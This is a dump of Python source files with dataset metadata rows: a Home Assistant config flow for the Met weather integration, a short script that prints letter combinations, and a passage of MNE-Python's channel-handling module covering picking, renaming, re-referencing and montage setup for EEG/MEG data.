] | 2 | 2019-10-19T15:07:32.000Z | 2022-01-29T10:33:20.000Z | homeassistant/components/met/config_flow.py | alemuro/home-assistant | 9b1315d8e55f0ca906c4c8a1b2ae8c2ea511dc90 | [
"Apache-2.0"
] | 4 | 2021-02-08T21:05:14.000Z | 2021-09-08T02:57:03.000Z | homeassistant/components/met/config_flow.py | alemuro/home-assistant | 9b1315d8e55f0ca906c4c8a1b2ae8c2ea511dc90 | [
"Apache-2.0"
] | 1 | 2019-10-04T13:26:54.000Z | 2019-10-04T13:26:54.000Z | """Config flow to configure Met component."""
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.const import CONF_ELEVATION, CONF_LATITUDE, CONF_LONGITUDE, CONF_NAME
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
from .const import DOMAIN, HOME_LOCATION_NAME, CONF_TRACK_HOME
@callback
def configured_instances(hass):
    """Return a set of the names of all configured Met instances.

    Used by the config flow to reject a new entry whose name collides
    with an existing one.
    """
    # Set comprehension instead of set(generator); the docstring previously
    # said "SimpliSafe" — a copy-paste error, this is the Met integration.
    return {
        entry.data[CONF_NAME]
        for entry in hass.config_entries.async_entries(DOMAIN)
    }
class MetFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
    """Config flow for Met component."""
    VERSION = 1
    CONNECTION_CLASS = config_entries.CONN_CLASS_CLOUD_POLL
    def __init__(self):
        """Init MetFlowHandler."""
        # Per-field validation errors shown on the form; reset on every step.
        self._errors = {}
    async def async_step_user(self, user_input=None):
        """Handle a flow initialized by the user."""
        self._errors = {}
        if user_input is not None:
            # Reject duplicate entry names; otherwise create the entry.
            if user_input[CONF_NAME] not in configured_instances(self.hass):
                return self.async_create_entry(
                    title=user_input[CONF_NAME], data=user_input
                )
            self._errors[CONF_NAME] = "name_exists"
        # First visit (or invalid input): show the form pre-filled with the
        # Home Assistant instance's configured home location.
        return await self._show_config_form(
            name=HOME_LOCATION_NAME,
            latitude=self.hass.config.latitude,
            longitude=self.hass.config.longitude,
            elevation=self.hass.config.elevation,
        )
    async def _show_config_form(
        self, name=None, latitude=None, longitude=None, elevation=None
    ):
        """Show the configuration form to edit location data."""
        return self.async_show_form(
            step_id="user",
            data_schema=vol.Schema(
                {
                    vol.Required(CONF_NAME, default=name): str,
                    vol.Required(CONF_LATITUDE, default=latitude): cv.latitude,
                    vol.Required(CONF_LONGITUDE, default=longitude): cv.longitude,
                    vol.Required(CONF_ELEVATION, default=elevation): int,
                }
            ),
            errors=self._errors,
        )
    async def async_step_onboarding(self, data=None):
        """Handle a flow initialized by onboarding."""
        # Onboarding entries track the HA home location automatically.
        return self.async_create_entry(
            title=HOME_LOCATION_NAME, data={CONF_TRACK_HOME: True}
        )
| 33.957746 | 88 | 0.64662 |
795ba64d85385384e85132135b8e9ad2f53906ed | 193 | py | Python | source/approximate/hash_collisions/generate_strings.py | kunalghosh/T-61.5060-Algorithmic-Methods-of-Data-Mining | 718b1ca4a3f83f1b244bb7ddeb5cc430b2967516 | [
"MIT"
] | null | null | null | source/approximate/hash_collisions/generate_strings.py | kunalghosh/T-61.5060-Algorithmic-Methods-of-Data-Mining | 718b1ca4a3f83f1b244bb7ddeb5cc430b2967516 | [
"MIT"
] | null | null | null | source/approximate/hash_collisions/generate_strings.py | kunalghosh/T-61.5060-Algorithmic-Methods-of-Data-Mining | 718b1ca4a3f83f1b244bb7ddeb5cc430b2967516 | [
"MIT"
] | null | null | null | import string
import itertools
import sys
combos = 3
if len(sys.argv) == 2:
combos = int(sys.argv[1])
for a in itertools.combinations(string.ascii_letters,combos):
print "-".join(a)
| 16.083333 | 61 | 0.699482 |
795ba720fe704388b6d6b8dc2bd3ed9e24112748 | 52,659 | py | Python | mne/channels/channels.py | jasmainak/mne-python | 039cb1bf52770019bd48ac028795af0861792fa2 | [
"BSD-3-Clause"
] | null | null | null | mne/channels/channels.py | jasmainak/mne-python | 039cb1bf52770019bd48ac028795af0861792fa2 | [
"BSD-3-Clause"
] | 2 | 2016-02-27T13:43:15.000Z | 2018-07-18T19:44:45.000Z | mne/channels/channels.py | jasmainak/mne-python | 039cb1bf52770019bd48ac028795af0861792fa2 | [
"BSD-3-Clause"
] | 1 | 2017-03-05T20:44:07.000Z | 2017-03-05T20:44:07.000Z | # Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
# Denis Engemann <denis.engemann@gmail.com>
# Andrew Dykstra <andrew.r.dykstra@gmail.com>
# Teon Brooks <teon.brooks@gmail.com>
#
# License: BSD (3-clause)
import os
import os.path as op
import numpy as np
from scipy import sparse
from ..externals.six import string_types
from ..utils import verbose, logger, warn, copy_function_doc_to_method_doc
from ..utils import _check_preload, _validate_type
from ..io.compensator import get_current_comp
from ..io.constants import FIFF
from ..io.meas_info import anonymize_info, Info
from ..io.pick import (channel_type, pick_info, pick_types, _picks_by_type,
_check_excludes_includes, _PICK_TYPES_KEYS,
channel_indices_by_type, pick_channels)
def _get_meg_system(info):
    """Educated guess for the helmet type based on channels.

    Inspects the first MEG channel whose coil type is recognized and
    returns the corresponding system name; defaults to '306m'.
    """
    for ch in info['chs']:
        if ch['kind'] != FIFF.FIFFV_MEG_CH:
            continue
        # Only take first 16 bits, as higher bits store CTF grad comp order
        coil_type = ch['coil_type'] & 0xFFFF
        if coil_type == FIFF.FIFFV_COIL_NM_122:
            return '122m'
        if coil_type // 1000 == 3:  # All Vectorview coils are 30xx
            return '306m'
        if coil_type in (FIFF.FIFFV_COIL_MAGNES_MAG,
                         FIFF.FIFFV_COIL_MAGNES_GRAD):
            # Distinguish the two 4D/BTi systems by their MEG channel count.
            n_mag = sum(c['kind'] == FIFF.FIFFV_MEG_CH for c in info['chs'])
            return 'Magnes_3600wh' if n_mag > 150 else 'Magnes_2500wh'
        if coil_type == FIFF.FIFFV_COIL_CTF_GRAD:
            return 'CTF_275'
        if coil_type == FIFF.FIFFV_COIL_KIT_GRAD:
            return 'KIT'
        if coil_type == FIFF.FIFFV_COIL_BABY_GRAD:
            return 'BabySQUID'
        if coil_type == FIFF.FIFFV_COIL_ARTEMIS123_GRAD:
            return 'ARTEMIS123'
    return '306m'
def _contains_ch_type(info, ch_type):
    """Check whether a certain channel type is in an info object.

    Parameters
    ----------
    info : instance of Info
        The measurement information.
    ch_type : str
        the channel type to be checked for

    Returns
    -------
    has_ch_type : bool
        Whether the channel type is present or not.
    """
    _validate_type(ch_type, 'str', "ch_type")
    # 'meg' itself is excluded: callers must ask for a concrete MEG subtype.
    extras = ['mag', 'grad', 'planar1', 'planar2', 'hbo', 'hbr']
    valid_channel_types = sorted(
        [key for key in _PICK_TYPES_KEYS if key != 'meg'] + extras)
    if ch_type not in valid_channel_types:
        raise ValueError('ch_type must be one of %s, not "%s"'
                         % (valid_channel_types, ch_type))
    if info is None:
        raise ValueError('Cannot check for channels of type "%s" because info '
                         'is None' % (ch_type,))
    return any(channel_type(info, idx) == ch_type
               for idx in range(info['nchan']))
def _get_ch_type(inst, ch_type):
    """Choose a single channel type (usually for plotting).

    Usually used in plotting to plot a single datatype, e.g. look for mags,
    then grads, then ... to plot.
    """
    # An explicit choice always wins.
    if ch_type is not None:
        return ch_type
    for candidate in ('mag', 'grad', 'planar1', 'planar2', 'eeg'):
        if isinstance(inst, Info):
            if _contains_ch_type(inst, candidate):
                return candidate
        elif candidate in inst:
            return candidate
    raise RuntimeError('No plottable channel types found')
@verbose
def equalize_channels(candidates, verbose=None):
    """Equalize channel picks for a collection of MNE-Python objects.

    Every object in ``candidates`` is reduced, in place, to the set of
    channel names common to all of them.

    Parameters
    ----------
    candidates : list
        list Raw | Epochs | Evoked | AverageTFR
    verbose : bool, str, int, or None
        If not None, override default verbose level (see :func:`mne.verbose`
        and :ref:`Logging documentation <tut_logging>` for more).

    Notes
    -----
    This function operates inplace.
    """
    from ..io.base import BaseRaw
    from ..epochs import BaseEpochs
    from ..evoked import Evoked
    from ..time_frequency import _BaseTFR
    for candidate in candidates:
        _validate_type(candidate,
                       (BaseRaw, BaseEpochs, Evoked, _BaseTFR),
                       "Instances to be modified",
                       "Raw, Epochs, Evoked or TFR")
    # Use the instance with the most channels as the naming template.
    n_chans = [c.info['nchan'] for c in candidates]
    chan_template = candidates[np.argmax(n_chans)].ch_names
    logger.info('Identifying common channels ...')
    name_sets = [set(c.ch_names) for c in candidates]
    common_channels = set(chan_template).intersection(*name_sets)
    dropped = list()
    for candidate in candidates:
        extra = list(set(candidate.ch_names) - common_channels)
        if extra:
            candidate.drop_channels(extra)
            dropped.extend(extra)
    if dropped:
        dropped = list(set(dropped))
        logger.info('Dropped the following channels:\n%s' % dropped)
    else:
        logger.info('all channels are corresponding, nothing to do.')
class ContainsMixin(object):
    """Mixin class for Raw, Evoked, Epochs."""

    def __contains__(self, ch_type):
        """Check channel type membership.

        Parameters
        ----------
        ch_type : str
            Channel type to check for. Can be e.g. 'meg', 'eeg', 'stim', etc.

        Returns
        -------
        in : bool
            Whether or not the instance contains the given channel type.

        Examples
        --------
        Channel type membership can be tested as::

            >>> 'meg' in inst  # doctest: +SKIP
            True
            >>> 'seeg' in inst  # doctest: +SKIP
            False
        """
        # 'meg' is an umbrella type covering magnetometers and gradiometers.
        if ch_type == 'meg':
            return (_contains_ch_type(self.info, 'mag') or
                    _contains_ch_type(self.info, 'grad'))
        return _contains_ch_type(self.info, ch_type)

    @property
    def compensation_grade(self):
        """The current gradient compensation grade."""
        return get_current_comp(self.info)
# XXX Eventually de-duplicate with _kind_dict of mne/io/meas_info.py
# Map human-readable channel-type name -> FIFF channel kind constant.
_human2fiff = {'ecg': FIFF.FIFFV_ECG_CH,
               'eeg': FIFF.FIFFV_EEG_CH,
               'emg': FIFF.FIFFV_EMG_CH,
               'eog': FIFF.FIFFV_EOG_CH,
               'exci': FIFF.FIFFV_EXCI_CH,
               'ias': FIFF.FIFFV_IAS_CH,
               'misc': FIFF.FIFFV_MISC_CH,
               'resp': FIFF.FIFFV_RESP_CH,
               'seeg': FIFF.FIFFV_SEEG_CH,
               'stim': FIFF.FIFFV_STIM_CH,
               'syst': FIFF.FIFFV_SYST_CH,
               'bio': FIFF.FIFFV_BIO_CH,
               'ecog': FIFF.FIFFV_ECOG_CH,
               'hbo': FIFF.FIFFV_FNIRS_CH,
               'hbr': FIFF.FIFFV_FNIRS_CH}
# Default measurement unit for each human-readable channel type.
# Keys must stay in sync with _human2fiff above.
_human2unit = {'ecg': FIFF.FIFF_UNIT_V,
               'eeg': FIFF.FIFF_UNIT_V,
               'emg': FIFF.FIFF_UNIT_V,
               'eog': FIFF.FIFF_UNIT_V,
               'exci': FIFF.FIFF_UNIT_NONE,
               'ias': FIFF.FIFF_UNIT_NONE,
               'misc': FIFF.FIFF_UNIT_V,
               'resp': FIFF.FIFF_UNIT_NONE,
               'seeg': FIFF.FIFF_UNIT_V,
               'stim': FIFF.FIFF_UNIT_NONE,
               'syst': FIFF.FIFF_UNIT_NONE,
               'bio': FIFF.FIFF_UNIT_V,
               'ecog': FIFF.FIFF_UNIT_V,
               'hbo': FIFF.FIFF_UNIT_MOL,
               'hbr': FIFF.FIFF_UNIT_MOL}
# Human-readable abbreviation for each FIFF unit constant (used in warnings).
_unit2human = {FIFF.FIFF_UNIT_V: 'V',
               FIFF.FIFF_UNIT_T: 'T',
               FIFF.FIFF_UNIT_T_M: 'T/m',
               FIFF.FIFF_UNIT_MOL: 'M',
               FIFF.FIFF_UNIT_NONE: 'NA'}
def _check_set(ch, projs, ch_type):
    """Ensure a channel-type change is compatible with projectors.

    Raises RuntimeError if the channel participates in any projector,
    otherwise updates ``ch['kind']`` in place.
    """
    fiff_kind = _human2fiff[ch_type]
    if ch['kind'] != fiff_kind:
        # Changing the kind would silently invalidate any SSP projector
        # that includes this channel, so refuse.
        offending = [p for p in projs
                     if ch['ch_name'] in p['data']['col_names']]
        if offending:
            raise RuntimeError('Cannot change channel type for channel %s '
                               'in projector "%s"'
                               % (ch['ch_name'], offending[0]['desc']))
    ch['kind'] = fiff_kind
class SetChannelsMixin(object):
    """Mixin class for Raw, Evoked, Epochs."""
    @verbose
    def set_eeg_reference(self, ref_channels='average', projection=False,
                          verbose=None):
        """Specify which reference to use for EEG data.
        By default, MNE-Python will automatically re-reference the EEG signal
        to use an average reference (see below). Use this function to
        explicitly specify the desired reference for EEG. This can be either an
        existing electrode or a new virtual channel. This function will
        re-reference the data according to the desired reference and prevent
        MNE-Python from automatically adding an average reference projection.
        Some common referencing schemes and the corresponding value for the
        ``ref_channels`` parameter:
        No re-referencing:
            If the EEG data is already using the proper reference, set
            ``ref_channels=[]``. This will prevent MNE-Python from
            automatically adding an average reference projection.
        Average reference:
            A new virtual reference electrode is created by averaging the
            current EEG signal by setting ``ref_channels='average'``. Bad EEG
            channels are automatically excluded if they are properly set in
            ``info['bads']``.
        A single electrode:
            Set ``ref_channels`` to a list containing the name of the channel
            that will act as the new reference, for example
            ``ref_channels=['Cz']``.
        The mean of multiple electrodes:
            A new virtual reference electrode is created by computing the
            average of the current EEG signal recorded from two or more
            selected channels. Set ``ref_channels`` to a list of channel names,
            indicating which channels to use. For example, to apply an average
            mastoid reference, when using the 10-20 naming scheme, set
            ``ref_channels=['M1', 'M2']``.
        Parameters
        ----------
        ref_channels : list of str | str
            The name(s) of the channel(s) used to construct the reference. To
            apply an average reference, specify ``'average'`` here (default).
            If an empty list is specified, the data is assumed to already have
            a proper reference and MNE will not attempt any re-referencing of
            the data. Defaults to an average reference.
        projection : bool
            If ``ref_channels='average'`` this argument specifies if the
            average reference should be computed as a projection (True) or not
            (False; default). If ``projection=True``, the average reference is
            added as a projection and is not applied to the data (it can be
            applied afterwards with the ``apply_proj`` method). If
            ``projection=False``, the average reference is directly applied to
            the data. If ``ref_channels`` is not ``'average'``, ``projection``
            must be set to ``False`` (the default in this case).
        verbose : bool, str, int, or None
            If not None, override default verbose level (see
            :func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
            for more).
        Returns
        -------
        inst : instance of Raw | Epochs | Evoked
            Data with EEG channels re-referenced. If ``ref_channels='average'``
            and ``projection=True`` a projection will be added instead of
            directly re-referencing the data.
        See Also
        --------
        mne.set_bipolar_reference : Convenience function for creating bipolar
                                    references.
        Notes
        -----
        1. If a reference is requested that is not the average reference, this
           function removes any pre-existing average reference projections.
        2. During source localization, the EEG signal should have an average
           reference.
        3. In order to apply a reference, the data must be preloaded. This is
           not necessary if ``ref_channels='average'`` and ``projection=True``.
        4. For an average reference, bad EEG channels are automatically
           excluded if they are properly set in ``info['bads']``.
        .. versionadded:: 0.9.0
        """
        from ..io.reference import set_eeg_reference
        # Delegate to the module-level helper, operating in place (copy=False).
        return set_eeg_reference(self, ref_channels=ref_channels, copy=False,
                                 projection=projection)[0]
    def _get_channel_positions(self, picks=None):
        """Get channel locations from info.
        Parameters
        ----------
        picks : array-like of int | None
            Indices of channels to include. If None (default), all meg and eeg
            channels that are available are returned (bad channels excluded).
        Returns
        -------
        pos : ndarray, shape (n_picks, 3)
            The first three ``loc`` entries (sensor position) per channel.
        Notes
        -----
        .. versionadded:: 0.9.0
        """
        if picks is None:
            picks = pick_types(self.info, meg=True, eeg=True)
        chs = self.info['chs']
        pos = np.array([chs[k]['loc'][:3] for k in picks])
        # A position of all zeros means "location unknown" for that channel.
        n_zero = np.sum(np.sum(np.abs(pos), axis=1) == 0)
        if n_zero > 1:  # XXX some systems have origin (0, 0, 0)
            raise ValueError('Could not extract channel positions for '
                             '{} channels'.format(n_zero))
        return pos
    def _set_channel_positions(self, pos, names):
        """Update channel locations in info.
        Parameters
        ----------
        pos : array-like | np.ndarray, shape (n_points, 3)
            The channel positions to be set.
        names : list of str
            The names of the channels to be set.
        Notes
        -----
        .. versionadded:: 0.9.0
        """
        if len(pos) != len(names):
            raise ValueError('Number of channel positions not equal to '
                             'the number of names given.')
        pos = np.asarray(pos, dtype=np.float)
        if pos.shape[-1] != 3 or pos.ndim != 2:
            msg = ('Channel positions must have the shape (n_points, 3) '
                   'not %s.' % (pos.shape,))
            raise ValueError(msg)
        for name, p in zip(names, pos):
            if name in self.ch_names:
                idx = self.ch_names.index(name)
                # Only the position entries of 'loc' are overwritten; the
                # orientation entries (loc[3:]) are left untouched.
                self.info['chs'][idx]['loc'][:3] = p
            else:
                msg = ('%s was not found in the info. Cannot be updated.'
                       % name)
                raise ValueError(msg)
    def set_channel_types(self, mapping):
        """Define the sensor type of channels.
        Note: The following sensor types are accepted:
            ecg, eeg, emg, eog, exci, ias, misc, resp, seeg, stim, syst, ecog,
            hbo, hbr
        Parameters
        ----------
        mapping : dict
            a dictionary mapping a channel to a sensor type (str)
            {'EEG061': 'eog'}.
        Notes
        -----
        .. versionadded:: 0.9.0
        """
        ch_names = self.info['ch_names']
        # first check and assemble clean mappings of index and name
        # unit_changes collects (old_unit, new_unit) -> [ch_names] so that a
        # single aggregated warning per unit transition is emitted at the end.
        unit_changes = dict()
        for ch_name, ch_type in mapping.items():
            if ch_name not in ch_names:
                raise ValueError("This channel name (%s) doesn't exist in "
                                 "info." % ch_name)
            c_ind = ch_names.index(ch_name)
            if ch_type not in _human2fiff:
                raise ValueError('This function cannot change to this '
                                 'channel type: %s. Accepted channel types '
                                 'are %s.'
                                 % (ch_type,
                                    ", ".join(sorted(_human2unit.keys()))))
            # Set sensor type (raises if the channel is part of a projector)
            _check_set(self.info['chs'][c_ind], self.info['projs'], ch_type)
            unit_old = self.info['chs'][c_ind]['unit']
            unit_new = _human2unit[ch_type]
            if unit_old not in _unit2human:
                raise ValueError("Channel '%s' has unknown unit (%s). Please "
                                 "fix the measurement info of your data."
                                 % (ch_name, unit_old))
            if unit_old != _human2unit[ch_type]:
                this_change = (_unit2human[unit_old], _unit2human[unit_new])
                if this_change not in unit_changes:
                    unit_changes[this_change] = list()
                unit_changes[this_change].append(ch_name)
            self.info['chs'][c_ind]['unit'] = _human2unit[ch_type]
            # Pick the coil type matching the new channel kind.
            if ch_type in ['eeg', 'seeg', 'ecog']:
                coil_type = FIFF.FIFFV_COIL_EEG
            elif ch_type == 'hbo':
                coil_type = FIFF.FIFFV_COIL_FNIRS_HBO
            elif ch_type == 'hbr':
                coil_type = FIFF.FIFFV_COIL_FNIRS_HBR
            else:
                coil_type = FIFF.FIFFV_COIL_NONE
            self.info['chs'][c_ind]['coil_type'] = coil_type
        msg = "The unit for channel(s) {0} has changed from {1} to {2}."
        for this_change, names in unit_changes.items():
            warn(msg.format(", ".join(sorted(names)), *this_change))
    def rename_channels(self, mapping):
        """Rename channels.
        Parameters
        ----------
        mapping : dict | callable
            a dictionary mapping the old channel to a new channel name
            e.g. {'EEG061' : 'EEG161'}. Can also be a callable function
            that takes and returns a string (new in version 0.10.0).
        Notes
        -----
        .. versionadded:: 0.9.0
        """
        # Delegate to the module-level rename_channels (operates on info).
        rename_channels(self.info, mapping)
    @verbose
    def set_montage(self, montage, set_dig=True, verbose=None):
        """Set EEG sensor configuration and head digitization.
        Parameters
        ----------
        montage : instance of Montage | instance of DigMontage | str | None
            The montage to use (None removes any location information).
        set_dig : bool
            If True, update the digitization information (``info['dig']``)
            in addition to the channel positions (``info['chs'][idx]['loc']``).
            .. versionadded: 0.15
        verbose : bool, str, int, or None
            If not None, override default verbose level (see
            :func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
            for more).
        Notes
        -----
        Operates in place.
        .. versionadded:: 0.9.0
        """
        from .montage import _set_montage
        _set_montage(self.info, montage, set_dig=set_dig)
        return self
    def plot_sensors(self, kind='topomap', ch_type=None, title=None,
                     show_names=False, ch_groups=None, to_sphere=True,
                     axes=None, block=False, show=True):
        """Plot sensor positions.
        Parameters
        ----------
        kind : str
            Whether to plot the sensors as 3d, topomap or as an interactive
            sensor selection dialog. Available options 'topomap', '3d',
            'select'. If 'select', a set of channels can be selected
            interactively by using lasso selector or clicking while holding
            control key. The selected channels are returned along with the
            figure instance. Defaults to 'topomap'.
        ch_type : None | str
            The channel type to plot. Available options 'mag', 'grad', 'eeg',
            'seeg', 'ecog', 'all'. If ``'all'``, all the available mag, grad,
            eeg, seeg and ecog channels are plotted. If None (default), then
            channels are chosen in the order given above.
        title : str | None
            Title for the figure. If None (default), equals to ``'Sensor
            positions (%s)' % ch_type``.
        show_names : bool | array of str
            Whether to display all channel names. If an array, only the channel
            names in the array are shown. Defaults to False.
        ch_groups : 'position' | array of shape (ch_groups, picks) | None
            Channel groups for coloring the sensors. If None (default), default
            coloring scheme is used. If 'position', the sensors are divided
            into 8 regions. See ``order`` kwarg of :func:`mne.viz.plot_raw`. If
            array, the channels are divided by picks given in the array.
            .. versionadded:: 0.13.0
        to_sphere : bool
            Whether to project the 3d locations to a sphere. When False, the
            sensor array appears similar as to looking downwards straight above
            the subject's head. Has no effect when kind='3d'. Defaults to True.
            .. versionadded:: 0.14.0
        axes : instance of Axes | instance of Axes3D | None
            Axes to draw the sensors to. If ``kind='3d'``, axes must be an
            instance of Axes3D. If None (default), a new axes will be created.
            .. versionadded:: 0.13.0
        block : bool
            Whether to halt program execution until the figure is closed.
            Defaults to False.
            .. versionadded:: 0.13.0
        show : bool
            Show figure if True. Defaults to True.
        Returns
        -------
        fig : instance of matplotlib figure
            Figure containing the sensor topography.
        selection : list
            A list of selected channels. Only returned if ``kind=='select'``.
        See Also
        --------
        mne.viz.plot_layout
        Notes
        -----
        This function plots the sensor locations from the info structure using
        matplotlib. For drawing the sensors using mayavi see
        :func:`mne.viz.plot_alignment`.
        .. versionadded:: 0.12.0
        """
        from ..viz.utils import plot_sensors
        return plot_sensors(self.info, kind=kind, ch_type=ch_type, title=title,
                            show_names=show_names, ch_groups=ch_groups,
                            to_sphere=to_sphere, axes=axes, block=block,
                            show=show)
    @copy_function_doc_to_method_doc(anonymize_info)
    def anonymize(self):
        """
        .. versionadded:: 0.13.0
        """
        # Strips subject-identifying fields from self.info in place.
        anonymize_info(self.info)
        return self
class UpdateChannelsMixin(object):
    """Mixin class for Raw, Evoked, Epochs, AverageTFR."""
    @verbose
    def pick_types(self, meg=True, eeg=False, stim=False, eog=False,
                   ecg=False, emg=False, ref_meg='auto', misc=False,
                   resp=False, chpi=False, exci=False, ias=False, syst=False,
                   seeg=False, dipole=False, gof=False, bio=False, ecog=False,
                   fnirs=False, include=(), exclude='bads', selection=None,
                   verbose=None):
        """Pick some channels by type and names.
        Parameters
        ----------
        meg : bool | str
            If True include all MEG channels. If False include None
            If string it can be 'mag', 'grad', 'planar1' or 'planar2' to select
            only magnetometers, all gradiometers, or a specific type of
            gradiometer.
        eeg : bool
            If True include EEG channels.
        stim : bool
            If True include stimulus channels.
        eog : bool
            If True include EOG channels.
        ecg : bool
            If True include ECG channels.
        emg : bool
            If True include EMG channels.
        ref_meg: bool | str
            If True include CTF / 4D reference channels. If 'auto', the
            reference channels are only included if compensations are present.
        misc : bool
            If True include miscellaneous analog channels.
        resp : bool
            If True include response-trigger channel. For some MEG systems this
            is separate from the stim channel.
        chpi : bool
            If True include continuous HPI coil channels.
        exci : bool
            Flux excitation channel used to be a stimulus channel.
        ias : bool
            Internal Active Shielding data (maybe on Triux only).
        syst : bool
            System status channel information (on Triux systems only).
        seeg : bool
            Stereotactic EEG channels.
        dipole : bool
            Dipole time course channels.
        gof : bool
            Dipole goodness of fit channels.
        bio : bool
            Bio channels.
        ecog : bool
            Electrocorticography channels.
        fnirs : bool | str
            Functional near-infrared spectroscopy channels. If True include all
            fNIRS channels. If False (default) include none. If string it can
            be 'hbo' (to include channels measuring oxyhemoglobin) or 'hbr' (to
            include channels measuring deoxyhemoglobin).
        include : list of string
            List of additional channels to include. If empty do not include
            any.
        exclude : list of string | str
            List of channels to exclude. If 'bads' (default), exclude channels
            in ``info['bads']``.
        selection : list of string
            Restrict sensor channels (MEG, EEG) to this list of channel names.
        verbose : bool, str, int, or None
            If not None, override default verbose level (see
            :func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
            for more).
        Returns
        -------
        inst : instance of Raw, Epochs, or Evoked
            The modified instance.
        See Also
        --------
        pick_channels
        Notes
        -----
        .. versionadded:: 0.9.0
        """
        idx = pick_types(
            self.info, meg=meg, eeg=eeg, stim=stim, eog=eog, ecg=ecg, emg=emg,
            ref_meg=ref_meg, misc=misc, resp=resp, chpi=chpi, exci=exci,
            ias=ias, syst=syst, seeg=seeg, dipole=dipole, gof=gof, bio=bio,
            ecog=ecog, fnirs=fnirs, include=include, exclude=exclude,
            selection=selection)
        return self._pick_drop_channels(idx)
    def pick_channels(self, ch_names):
        """Pick some channels.
        Parameters
        ----------
        ch_names : list
            The list of channels to select.
        Returns
        -------
        inst : instance of Raw, Epochs, or Evoked
            The modified instance.
        See Also
        --------
        drop_channels
        pick_types
        reorder_channels
        Notes
        -----
        The channel names given are assumed to be a set, i.e. the order
        does not matter. The original order of the channels is preserved.
        You can use ``reorder_channels`` to set channel order if necessary.
        .. versionadded:: 0.9.0
        """
        return self._pick_drop_channels(
            pick_channels(self.info['ch_names'], ch_names))
    def reorder_channels(self, ch_names):
        """Reorder channels.
        Parameters
        ----------
        ch_names : list
            The desired channel order.
        Returns
        -------
        inst : instance of Raw, Epochs, or Evoked
            The modified instance.
        See Also
        --------
        drop_channels
        pick_types
        pick_channels
        Notes
        -----
        Channel names must be unique. Channels that are not in ``ch_names``
        are dropped.
        .. versionadded:: 0.16.0
        """
        _check_excludes_includes(ch_names)
        idx = list()
        for ch_name in ch_names:
            ii = self.ch_names.index(ch_name)
            if ii in idx:
                raise ValueError('Channel name repeated: %s' % (ch_name,))
            idx.append(ii)
        return self._pick_drop_channels(idx)
    def drop_channels(self, ch_names):
        """Drop some channels.
        Parameters
        ----------
        ch_names : list
            List of the names of the channels to remove.
        Returns
        -------
        inst : instance of Raw, Epochs, or Evoked
            The modified instance.
        See Also
        --------
        reorder_channels
        pick_channels
        pick_types
        Notes
        -----
        .. versionadded:: 0.9.0
        """
        msg = ("'ch_names' should be a list of strings (the name[s] of the "
               "channel to be dropped), not a {0}.")
        if isinstance(ch_names, string_types):
            raise ValueError(msg.format("string"))
        else:
            # NOTE(review): the error message reports the type of the first
            # element even when a later element is the non-string offender.
            if not all([isinstance(ch_name, string_types)
                        for ch_name in ch_names]):
                raise ValueError(msg.format(type(ch_names[0])))
        missing = [ch_name for ch_name in ch_names
                   if ch_name not in self.ch_names]
        if len(missing) > 0:
            msg = "Channel(s) {0} not found, nothing dropped."
            raise ValueError(msg.format(", ".join(missing)))
        bad_idx = [self.ch_names.index(ch_name) for ch_name in ch_names
                   if ch_name in self.ch_names]
        idx = np.setdiff1d(np.arange(len(self.ch_names)), bad_idx)
        return self._pick_drop_channels(idx)
    def _pick_drop_channels(self, idx):
        """Keep only the channels at indices ``idx``, updating all state.

        ``idx`` also defines the new channel order; info, calibrations,
        projector and the data array are all subset consistently.
        """
        # avoid circular imports
        from ..time_frequency import AverageTFR, EpochsTFR
        _check_preload(self, 'adding, dropping, or reordering channels')
        if getattr(self, 'picks', None) is not None:
            self.picks = self.picks[idx]
        if hasattr(self, '_cals'):
            self._cals = self._cals[idx]
        pick_info(self.info, idx, copy=False)
        if getattr(self, '_projector', None) is not None:
            self._projector = self._projector[idx][:, idx]
        # All others (Evoked, Epochs, Raw) have chs axis=-2
        axis = -3 if isinstance(self, (AverageTFR, EpochsTFR)) else -2
        self._data = self._data.take(idx, axis=axis)
        return self
    def add_channels(self, add_list, force_update_info=False):
        """Append new channels to the instance.
        Parameters
        ----------
        add_list : list
            A list of objects to append to self. Must contain all the same
            type as the current object
        force_update_info : bool
            If True, force the info for objects to be appended to match the
            values in `self`. This should generally only be used when adding
            stim channels for which important metadata won't be overwritten.
            .. versionadded:: 0.12
        Returns
        -------
        inst : instance of Raw, Epochs, or Evoked
            The modified instance.
        See Also
        --------
        drop_channels
        """
        # avoid circular imports
        from ..io import BaseRaw, _merge_info
        from ..epochs import BaseEpochs
        _validate_type(add_list, (list, tuple), 'Input')
        # Object-specific checks
        for inst in add_list + [self]:
            _check_preload(inst, "adding channels")
        # The channel axis differs by container type (Raw: 0, Epochs: 1).
        if isinstance(self, BaseRaw):
            con_axis = 0
            comp_class = BaseRaw
        elif isinstance(self, BaseEpochs):
            con_axis = 1
            comp_class = BaseEpochs
        else:
            con_axis = 0
            comp_class = type(self)
        for inst in add_list:
            _validate_type(inst, comp_class, 'All input')
        data = [inst._data for inst in [self] + add_list]
        # Make sure that all dimensions other than channel axis are the same
        compare_axes = [i for i in range(data[0].ndim) if i != con_axis]
        shapes = np.array([dat.shape for dat in data])[:, compare_axes]
        for shape in shapes:
            if not ((shapes[0] - shape) == 0).all():
                raise AssertionError('All data dimensions except channels '
                                     'must match, got %s != %s'
                                     % (shapes[0], shape))
        # Create final data / info objects
        data = np.concatenate(data, axis=con_axis)
        infos = [self.info] + [inst.info for inst in add_list]
        new_info = _merge_info(infos, force_update_to_first=force_update_info)
        # Now update the attributes
        self._data = data
        self.info = new_info
        if isinstance(self, BaseRaw):
            self._cals = np.concatenate([getattr(inst, '_cals')
                                         for inst in [self] + add_list])
        return self
class InterpolationMixin(object):
    """Mixin class for Raw, Evoked, Epochs."""

    @verbose
    def interpolate_bads(self, reset_bads=True, mode='accurate',
                         verbose=None):
        """Interpolate bad MEG and EEG channels.

        Operates in place.

        Parameters
        ----------
        reset_bads : bool
            If True, remove the bads from info.
        mode : str
            Either ``'accurate'`` or ``'fast'``, determines the quality of the
            Legendre polynomial expansion used for interpolation of MEG
            channels.
        verbose : bool, str, int, or None
            If not None, override default verbose level (see
            :func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
            for more).

        Returns
        -------
        inst : instance of Raw, Epochs, or Evoked
            The modified instance.

        Notes
        -----
